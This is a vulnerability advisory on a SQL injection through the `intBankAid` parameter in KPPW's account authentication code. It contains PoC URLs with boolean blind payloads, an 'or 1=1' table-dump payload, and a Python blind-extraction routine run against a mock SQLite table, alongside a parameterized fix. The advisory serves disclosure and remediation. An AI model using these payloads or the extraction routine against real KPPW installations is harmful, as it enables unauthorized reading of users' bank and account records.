### Brief description:

KPPW latest version SQL injection vulnerability II

### Details:

KPPW latest version SQL injection vulnerability II

File `/control/user/account_auth.php`:

```php
$arrAllowAuth = array('realname','enterprise','bank','mobile','email');
if ($code&&in_array($code,$arrAllowAuth)) {
    $code or $code = $keys ['0'];
    $code or kekezu::show_msg ( $_lang ['param_error'], "index.php?do=auth", 3, '', 'warning' );
    $auth_class = "keke_auth_" . $code . "_class";
    $objAuth = new $auth_class ( $code );
    $auth_item = $arrAllAuthItems [$code];
    $auth_dir = $auth_item ['auth_dir'];
    $arrAuthInfo = $objAuth->get_user_auth_info ( $gUid, 0, $intBankAid );
    require S_ROOT . "/auth/$code/control/index.php";
    require keke_tpl_class::template ( 'auth/' . $code . '/tpl/' . $_K ['template'] . '/'.$step );
    die;
} else {
    $real_pass = keke_auth_fac_class::auth_check ( 'enterprise', $gUid ) or $real_pass = keke_auth_fac_class::auth_check ( "realname", $gUid );
    $arrHasAuthItem = keke_auth_fac_class::get_auth ( $gUserInfo );
    $arrUserAuthInfo = $arrHasAuthItem ['info'];
}
```

Look closely at this line:

```php
$arrAuthInfo = $objAuth->get_user_auth_info ( $gUid, 0, $intBankAid );
```

The request parameter `$intBankAid` is passed straight into `get_user_auth_info()` as its third argument. Following that function into `/lib/sys/keke_auth_base_class.php`:

```php
public function get_user_auth_info($uid,$is_username=0,$show_id=''){
    $sql="select * from ".TABLEPRE.$this->_auth_table_name;
    if($uid){
        $is_username=='0' and $sql.=" where uid = '$uid' " or $sql.=" where username = '$uid' ";
        $show_id and $sql.=" and ".$this->_primary_key."=".$show_id;
        $sql .=" order by $this->_primary_key desc";
        $data = db_factory::query($sql);
        if(sizeof($data)==1){
            return $data[0];
        }else{
            return $data;
        }
    }else{
        return array();
    }
}
```

`$intBankAid` arrives as `$show_id`, and `$show_id` is concatenated into `$sql` unquoted (`... and <primary_key>=$show_id`). At no point in this path is `$intBankAid` filtered or cast to an integer, so it reaches the database verbatim and yields a SQL injection. Because the value lands in a numeric comparison, no quote character is needed to break out of the query: appending `and 1=1` / `and 1=2` already changes whether a row is returned, which is what the blind-injection proof below relies on.

### Proof of vulnerability:

Boolean-based blind injection. This request returns the bank record (condition true):

```
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and 1=1
```

![1.png](https://images.seebug.org/upload/201412/06225747722702352c15a78e45d58540772776b1.png)

This request returns nothing (condition false):

```
http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=auth&code=bank&step=step2&intBankAid=147 and 1=2
```

![2.png](https://images.seebug.org/upload/201412/06225800b5fa7be4805496855e497bac4340f787.png)

Database query log showing the injected statement being executed:

![3.png](https://images.seebug.org/upload/201412/062258161511485ba1aadc5d69092d4b3ef5548d.png)
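The following is an added example, not code from KPPW or from the original report. It re-implements the string building of `get_user_auth_info()` in Python over an in-memory SQLite table so the two PoC payloads can be run offline, shows how the same true/false oracle extracts data one character at a time, and places a hardened version beside it. The table name `keke_witkey_auth_bank`, the primary key `bank_id`, the column layout and the rows are all assumptions constructed for the demo; KPPW's real schema is not shown on the page.

```python
import sqlite3

# Assumed stand-ins for TABLEPRE . $this->_auth_table_name and $this->_primary_key.
TABLEPRE = "keke_"
AUTH_TABLE = "witkey_auth_bank"
PRIMARY_KEY = "bank_id"


def setup_db():
    """Constructed sample data: two bank records for uid 2, one for uid 5."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        f"create table {TABLEPRE}{AUTH_TABLE} "
        "(bank_id integer primary key, uid integer, username text, bank_name text)"
    )
    conn.executemany(
        f"insert into {TABLEPRE}{AUTH_TABLE} values (?,?,?,?)",
        [(147, 2, "alice", "Bank A"), (148, 2, "alice", "Bank B"), (200, 5, "bob", "Bank C")],
    )
    return conn


def build_vulnerable_sql(uid, is_username=0, show_id=""):
    """Mirrors the concatenation in keke_auth_base_class::get_user_auth_info.
    show_id ($intBankAid) is appended unquoted, so no quote is needed to inject.
    PHP treats "" and "0" as false, which is reproduced here."""
    sql = f"select * from {TABLEPRE}{AUTH_TABLE}"
    if is_username == 0:
        sql += f" where uid = '{uid}' "
    else:
        sql += f" where username = '{uid}' "
    if show_id and show_id != "0":
        sql += f" and {PRIMARY_KEY}={show_id}"
    sql += f" order by {PRIMARY_KEY} desc"
    return sql


def vulnerable_query(conn, uid, show_id):
    """Runs the concatenated statement exactly as the vulnerable code would."""
    return conn.execute(build_vulnerable_sql(uid, 0, show_id)).fetchall()


def oracle(conn, condition):
    """Boolean-based blind oracle built on the PoC: '147 and 1=1' returns the
    row, '147 and 1=2' does not, so any condition can be tested the same way."""
    return len(vulnerable_query(conn, 2, f"147 and ({condition})")) == 1


def extract_string(conn, subquery, charset="abcdefghijklmnopqrstuvwxyz0123456789_", max_len=32):
    """Recovers the result of an arbitrary scalar subquery one character at a
    time using only the true/false oracle (substr/length exist in MySQL and SQLite)."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(conn, f"substr(({subquery}),{pos},1)='{ch}'"):
                result += ch
                break
        else:
            break  # no character matched: end of string
    return result


def is_valid_bank_aid(show_id):
    """Hardening check: the bank id must be a plain non-negative integer."""
    return isinstance(show_id, str) and show_id.isdigit()


def hardened_query(conn, uid, show_id):
    """Fixed version: validate/cast the id and bind every value as a parameter."""
    sql = f"select * from {TABLEPRE}{AUTH_TABLE} where uid = ?"
    params = [uid]
    if show_id and show_id != "0":
        if not is_valid_bank_aid(show_id):
            raise ValueError("intBankAid must be an integer")
        sql += f" and {PRIMARY_KEY} = ?"
        params.append(int(show_id))
    sql += f" order by {PRIMARY_KEY} desc"
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print(build_vulnerable_sql(2, 0, "147 and 1=1"))
    print(vulnerable_query(db, 2, "147 and 1=1"))   # one row
    print(vulnerable_query(db, 2, "147 and 1=2"))   # no rows
    print(vulnerable_query(db, 2, "147 or 1=1"))    # every row in the table
    print(extract_string(db, f"select username from {TABLEPRE}{AUTH_TABLE} where uid=5"))
    print(hardened_query(db, 2, "147"))
```

The `147 or 1=1` case shows the damage goes beyond the user's own rows: `AND` binds tighter than `OR`, so the `uid` restriction is defeated and the whole table comes back. In PHP the equivalent fix is `intval($intBankAid)` before the call (or a prepared statement with the id bound), which is also the check `is_valid_bank_aid` models here.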